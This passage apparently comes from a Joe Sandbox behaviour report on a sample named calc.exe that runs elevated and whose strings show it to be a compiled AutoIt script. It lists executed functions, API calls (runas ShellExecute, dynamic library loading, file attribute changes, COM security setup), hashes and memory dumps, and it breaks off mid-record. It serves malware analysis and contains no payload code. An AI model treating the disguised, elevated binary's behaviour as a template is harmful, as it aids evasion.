Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\calc.exe"
Imagebase:	0x400000
File size:	206'377 bytes
MD5 hash:	2F9FDAD776D8626F2CE8625211831E91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.9%
Total number of Nodes:	1849
Total number of Limit Nodes:	23

Executed Functions

Function 00439814 Relevance: 60.4, APIs: 11, Strings: 23, Instructions: 893libraryloaderCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00439B3E
LoadLibraryW.KERNEL32(00000000), ref: 00439D9D
GetProcAddress.KERNEL32(?,00000000), ref: 00439E47
GetProcAddress.KERNEL32(?,00000000), ref: 00439E72
GetProcAddress.KERNEL32(?,00000000), ref: 00439EB3
FreeLibrary.KERNEL32(?), ref: 00439ECB
_strcat.LIBCMT ref: 00439F85
GetCurrentProcess.KERNEL32(00000000,00000067,000000FF), ref: 0043A15D
TerminateProcess.KERNEL32(00000000), ref: 0043A164
FreeLibrary.KERNEL32(?), ref: 0043A2A5

Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898

Strings

string, xrefs: 004399F5
hwnd, xrefs: 00439A5E
wstring, xrefs: 00439A3E
int_ptr, xrefs: 00439934
ptr, xrefs: 00439999
long, xrefs: 00439911
short_ptr, xrefs: 00439852
wstr, xrefs: 00439A1A
cdecl, xrefs: 00439B93
long_ptr, xrefs: 0043997C
short, xrefs: 00439826
stdcall, xrefs: 00439BE0
idispatch_ptr, xrefs: 00439AA7
idispatch, xrefs: 00439A8A
int, xrefs: 004398D8
uint, xrefs: 00439957
dword, xrefs: 00439898
udword, xrefs: 004398BB
str, xrefs: 004399C2
winapi, xrefs: 00439BC2
ushort, xrefs: 00439871
none, xrefs: 00439C68, 0043A0F1
su, xrefs: 00439ECB, 0043A2A5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressCharLibraryProc$ByteFreeMultiProcessWide$BuffCurrentLoadLowerTerminate_strcat_strlen
String ID: cdecl$dword$hwnd$idispatch$idispatch_ptr$int$int_ptr$long$long_ptr$none$ptr$short$short_ptr$stdcall$str$string$udword$uint$ushort$winapi$wstr$wstring$su
API String ID: 1015931265-1097013067
Opcode ID: b7f5250f3d76f2b796286c4aebe95d02976f0a3ff1a8833c05814b8d644c070d
Instruction ID: 62d45698e8f6199696b40485e1186079554493d45d8b932d3fe4b0ade1180d93
Opcode Fuzzy Hash: b7f5250f3d76f2b796286c4aebe95d02976f0a3ff1a8833c05814b8d644c070d
Instruction Fuzzy Hash: 2562B431D00618AFDF11DFA5C8416DEB7B1AF09314F1441ABE905BB2A1CBB99E85CF89

Function 00425639 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 117
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00425657
GetFileAttributesW.KERNEL32(?,75728FB0), ref: 004256A6
SetFileAttributesW.KERNEL32(?,00000000), ref: 004256BE
FindNextFileW.KERNELBASE(00000000,?,75728FB0), ref: 004256D0
FindClose.KERNEL32(00000000), ref: 004256DB

Strings

*.*, xrefs: 004256F8

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: File$Find$Attributes$CloseFirstNext
String ID: *.*
API String ID: 3380241538-438819550
Opcode ID: 1236b3d9e8567393027ac3975af6954621a9665af5743f4ca753b3688c86b07b
Instruction ID: 4e70fa6d35b8864b9043a15bda1432a6da936626901fdaf7e3990b9e5699e330
Opcode Fuzzy Hash: 1236b3d9e8567393027ac3975af6954621a9665af5743f4ca753b3688c86b07b
Instruction Fuzzy Hash: E7319471601629FADF209FA0EC49EDF77ACAF44311F5004A7E804A2191EA79DE449B18

Function 0040109D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 004010BF

Part of subcall function 004013E2: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401412
Part of subcall function 004013E2: GetModuleFileNameW.KERNEL32(00000000,?,00000104,CmdLine), ref: 0040151F

SetCurrentDirectoryW.KERNEL32(?,?,?), ref: 0040116B
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004011B2
GetForegroundWindow.USER32(runas,?,?,?,00000001,0045C5B4,?,0045C5B4), ref: 004011FC
ShellExecuteW.SHELL32(00000000), ref: 00401203
SetCurrentDirectoryW.KERNEL32(?,00000001,?,?), ref: 00401272

Strings

runas, xrefs: 004011F7, 0040122A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CurrentDirectoryFileModuleName$ExecuteForegroundShellWindow
String ID: runas
API String ID: 1789910257-4000483414
Opcode ID: fca41f01e45967370695c3549b6e1bc3f8c9ac1c7ce2e165cd1ff878592f802b
Instruction ID: 93bf78c1261f2050e188375e0006e403e34581d150756637ae35598e928dc03f
Opcode Fuzzy Hash: fca41f01e45967370695c3549b6e1bc3f8c9ac1c7ce2e165cd1ff878592f802b
Instruction Fuzzy Hash: 5F41C571904258AEDF10ABA09C85BEE3B689B09315F0041BBF945B61E3C77CDD898B69

Function 00430DCB Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 250
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00430E15
CLSIDFromProgID.COMBASE(00000000,?), ref: 00430E32
CoCreateInstance.COMBASE(?,00000000,00000005,0045AFF8,?), ref: 00430E71
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00430F05
CoCreateInstanceEx.COMBASE(?,00000000,00000010,?,00000001,?), ref: 0043103D
CoSetProxyBlanket.COMBASE(?,?,?,?,?,?,?,00000800), ref: 00431078

Strings

NULL Pointer assignment, xrefs: 00431096

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CreateInitializeInstance$BlanketFromProgProxySecurity
String ID: NULL Pointer assignment
API String ID: 628432406-2785691316
Opcode ID: 5c06bdcd255b1af44cf6dbf1df8dc1709bf9c4df936050c641524a3b60c45350
Instruction ID: e386be8ca80e5d29cc4fe2e7b532a083d7082a5dc51ef75c75596564310f3180
Opcode Fuzzy Hash: 5c06bdcd255b1af44cf6dbf1df8dc1709bf9c4df936050c641524a3b60c45350
Instruction Fuzzy Hash: 7A91157290020CEFDF10EFA5DC81ADE7BB8FB08358F10462AF915A7251E7799D858B94

Function 0040EA76 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?,00000000,004679CC), ref: 0040EA94
GetCurrentProcess.KERNEL32(?), ref: 0040ED0B
GetNativeSystemInfo.KERNEL32(?), ref: 0040ED63
FreeLibrary.KERNEL32(?), ref: 0040ED6E
GetSystemInfo.KERNEL32(?), ref: 0040ED8A
FreeLibrary.KERNEL32(?), ref: 0040EDC9

Strings

su, xrefs: 0040ED3C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FreeInfoLibrarySystem$CurrentNativeProcessVersion
String ID: su
API String ID: 3962325948-45427494
Opcode ID: fd84d08cd9ce2f4a01dc3825daa42302a09dd8bccc91ef5021881d8614257327
Instruction ID: f2ba6a2bae675f251a30583b53330f3553dad9bf7d35c900dc6b7b295430e01b
Opcode Fuzzy Hash: fd84d08cd9ce2f4a01dc3825daa42302a09dd8bccc91ef5021881d8614257327
Instruction Fuzzy Hash: 3DA1FC30449298CDEF11DF69C4887D53FA49F25308F1844FADC499E29BC2BA9698C7B6

Function 0043244B Relevance: .6, Instructions: 624COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _strcat
String ID:
API String ID: 1765576173-0
Opcode ID: b74d6b0b4cdaa55ab891e3e3bed31b96946f76edf7e19a225481c97117b44b67
Instruction ID: ad6fddf512afab15d5a1fa4b9b21ac99af1229bc60d9f9e6aa2c51089999b3cd
Opcode Fuzzy Hash: b74d6b0b4cdaa55ab891e3e3bed31b96946f76edf7e19a225481c97117b44b67
Instruction Fuzzy Hash: 02423631600219DBCF28EF59CA81AED77B1BF08304F55512BF81997262C778ED86CB89

Function 0040127D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00401287
LoadCursorW.USER32(00000000,00007F00), ref: 00401297
LoadIconW.USER32(000000A1), ref: 004012B2
LoadIconW.USER32(000000A4), ref: 004012C1
LoadImageW.USER32(000000A1,00000001,00000010,00000010,00000000), ref: 004012F9
RegisterClassExW.USER32(?), ref: 0040134D

Part of subcall function 00416168: EnumResourceNamesW.KERNEL32(00000000,0000000E,0041605B,000000A1,004012E6,000000A1,?,?,?,?,?,?,?,00401243,?,?), ref: 00416192
Part of subcall function 00416168: LoadImageW.USER32(000000A1,00000001,00000010,00000010,00000000,004012E6), ref: 004161B3

Strings

#, xrefs: 00401335
0, xrefs: 0040132E
AutoIt v3, xrefs: 0040133F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Load$IconImage$BrushClassColorCursorEnumNamesRegisterResource
String ID: #$0$AutoIt v3
API String ID: 3434626496-4155596026
Opcode ID: 372e31f16fea0fb377c9d9b2b166fb2a5c841b5732346904167e8dc8eb2c6d20
Instruction ID: 687afa9ac2c609e1a5e33ec6c472dbacfde120021dee70f4c48a98386cd57c87
Opcode Fuzzy Hash: 372e31f16fea0fb377c9d9b2b166fb2a5c841b5732346904167e8dc8eb2c6d20
Instruction Fuzzy Hash: 05314975D00318AFCB11DFA5EC88B9E7FB4EB48318F10447AE508AB3A1E3B45980CB59

Function 00431B0A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

NULL Pointer assignment, xrefs: 00431B78, 00431DB6
Conversion of parameters failed, xrefs: 00431C20
Not an Object type, xrefs: 00431B61
VENTOBJ, xrefs: 00431BDD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID:
String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type$VENTOBJ
API String ID: 0-2292573353
Opcode ID: 4755cb53e4409388185389105b0b2e7a1e198d802851bdd96be41fb2e530ff23
Instruction ID: 2bcbba87d7390d1434edf13330aba9ece891a3e4bcb3d2eb952acb4fb6b50e10
Opcode Fuzzy Hash: 4755cb53e4409388185389105b0b2e7a1e198d802851bdd96be41fb2e530ff23
Instruction Fuzzy Hash: 10919E71A00309ABDF14DFA5CD85EEEB7B9AF08700F10511BF911A72A1D778AE40CB99

Function 004253C3 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00425579
SetCurrentDirectoryW.KERNEL32(?), ref: 0042558C
GetFileAttributesW.KERNEL32(?), ref: 004255AA
SetFileAttributesW.KERNEL32(?,00000000), ref: 004255C2
SetCurrentDirectoryW.KERNEL32(?), ref: 004255D3
SetCurrentDirectoryW.KERNEL32(?), ref: 004255ED
SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 0042562E

Part of subcall function 00414E55: GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59

Strings

*.*, xrefs: 004255F5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 4060c85384e43a68a18dcb34ae9707316a9a80c1a26ced448f1b3118e47c3abc
Instruction ID: cec699d4ab6f872af63f9f09c0b7b1415ff4196bd1174d8bb20d814695fc6a34
Opcode Fuzzy Hash: 4060c85384e43a68a18dcb34ae9707316a9a80c1a26ced448f1b3118e47c3abc
Instruction Fuzzy Hash: C171C975A00529AADB20FA54EC44BDAF378EB04316FD480ABE549D3140DB3C9EC68F59

Function 0040165B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 131
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFocus.USER32 ref: 004016C6

Strings

TaskbarCreated, xrefs: 00401720

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Focus
String ID: TaskbarCreated
API String ID: 2734777837-2362178303
Opcode ID: c7910e21aebc1e6a89a499fde730aec7c7ffe658abb426c78a0addb64026b91b
Instruction ID: f800d809c8c6698ce890321309edba9d95731fd3cb02d329e72dbe3815dc5fcc
Opcode Fuzzy Hash: c7910e21aebc1e6a89a499fde730aec7c7ffe658abb426c78a0addb64026b91b
Instruction Fuzzy Hash: D141FCB2514249EFDB26BF68DC449AA3A96B740305F18843BF505E32F1D67DCC64872E

Function 00404205 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 49
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00404213
RegisterClassExW.USER32(?), ref: 0040425E
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00404269
LoadIconW.USER32(00400000,000000A9), ref: 004042A8

Strings

+, xrefs: 0040423F
AutoIt v3 GUI, xrefs: 00404250
0, xrefs: 00404238
TaskbarCreated, xrefs: 00404264

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: fae248194e1b08d180a7888b94dd6c1f5fcc801a55d459cf83fb6d57dbcbcab5
Instruction ID: f45efb3e6643885d8ae29e22a69861e66850a50a293dcdb7155dbe3626e9ac17
Opcode Fuzzy Hash: fae248194e1b08d180a7888b94dd6c1f5fcc801a55d459cf83fb6d57dbcbcab5
Instruction Fuzzy Hash: 3A2164B1810308EFDB10DFA4D889BDEBBF4FB08726F00452AE642A62D1D7B59548CF54

Function 0040F71A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 164
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F781
RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 0040F815
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 0040F83F
RegCloseKey.ADVAPI32(?), ref: 0040F92A

Strings

Include, xrefs: 0040F7AA, 0040F830
Software\AutoIt v3\AutoIt, xrefs: 0040F80B
\, xrefs: 0040F8BC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: Include$Software\AutoIt v3\AutoIt$\
API String ID: 3617018055-2276155026
Opcode ID: 03b03b1970ee83669f439e37e25cce8a1ceb94ebf8fe9a10bc2f80fcae784922
Instruction ID: 50f134da1176b66dbd367ed9ac3c4cf0d0d6e1090dbeac708e74059743c4f1f0
Opcode Fuzzy Hash: 03b03b1970ee83669f439e37e25cce8a1ceb94ebf8fe9a10bc2f80fcae784922
Instruction Fuzzy Hash: 60512BB2940718AFD720DFA5C88499BB7F8FF18704F5045AFE54AE3641E734AA44CB58

Function 0044BE98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(?,0045B1B8,00000060), ref: 0044BEB8
GetModuleHandleA.KERNEL32(00000000,?,0045B1B8,00000060), ref: 0044BF0B
_fast_error_exit.LIBCMT ref: 0044BF6D
_fast_error_exit.LIBCMT ref: 0044BF7E
GetStartupInfoW.KERNEL32(?,?,0045B1B8,00000060), ref: 0044BFF0
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0044C013

Strings

`su, xrefs: 0044BF05

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: HandleModule_fast_error_exit$InfoStartupVersion
String ID: `su
API String ID: 3067550359-864551503
Opcode ID: e15d8d6f7bf71f38bc871b6429c016019c3b91647409690afd64dbd241c0bdb0
Instruction ID: 4397700529556a9b6abbbd61bb681adda0ddf508862c8991d2dc27ae9542f7d9
Opcode Fuzzy Hash: e15d8d6f7bf71f38bc871b6429c016019c3b91647409690afd64dbd241c0bdb0
Instruction Fuzzy Hash: F941B670D01310DAEB21AFA69C056AE36A0EF44718F24443FF808DA292DB7CC945DBDD

Function 0041F7E3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0041F82A
UnregisterHotKey.USER32(?), ref: 0041F860
FindClose.KERNEL32(?), ref: 0041F8D9
FreeLibrary.KERNEL32(00000000), ref: 0041F935

Strings

close all, xrefs: 0041F825
su, xrefs: 0041F935

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

